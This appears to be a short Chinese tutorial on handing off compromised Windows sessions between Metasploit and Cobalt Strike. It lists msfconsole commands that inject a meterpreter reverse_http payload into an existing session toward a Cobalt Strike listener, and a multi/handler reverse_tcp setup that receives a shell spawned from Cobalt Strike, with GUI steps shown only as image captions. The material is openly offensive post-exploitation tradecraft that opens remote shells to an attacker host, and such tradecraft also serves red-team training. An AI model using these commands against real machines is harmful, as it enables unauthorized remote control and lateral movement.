Cobalt Strike之与msf互相派生shell

一,msf派生shell给cobalstrike

1,cs添加监听器

Cobalt Strike之与msf互相派生shell_第1张图片

2,msf上在已经获取到的会话(shell)中注入一个新的payload

msf exploit(handler) >  use exploit/windows/local/payload_inject 
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http //cs监听器中相同
msf exploit(payload_inject) > set DisablePayloadHandler true //告诉msf已建立监听,不必新建监听
msf exploit(payload_inject) > set LHOST 192.168.229.143 //cs的IP
msf exploit(payload_inject) > set LPORT 3333 //cs监听器中监听的端口
msf exploit(payload_inject) > set SESSION 1  
msf exploit(payload_inject) > exploit 

Cobalt Strike之与msf互相派生shell_第2张图片

3,查看cs上已经获得了shell了

二,cobalstrike派生shell给msf

1,msf上配置监听

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.135.128
msf exploit(handler) > set lport 9999
msf exploit(handler) > exploit

Cobalt Strike之与msf互相派生shell_第3张图片

2,cobalstrike上创建一个新的监听器windows/foreign/reverse_tcp Listener

Cobalt Strike之与msf互相派生shell_第4张图片

3,右键需要派生的shell,点击增加会话

Cobalt Strike之与msf互相派生shell_第5张图片

4,选择刚刚配置的监听器

Cobalt Strike之与msf互相派生shell_第6张图片

5,msf上获取到会话

 

 

 

 

 

 

 

你可能感兴趣的:(工具)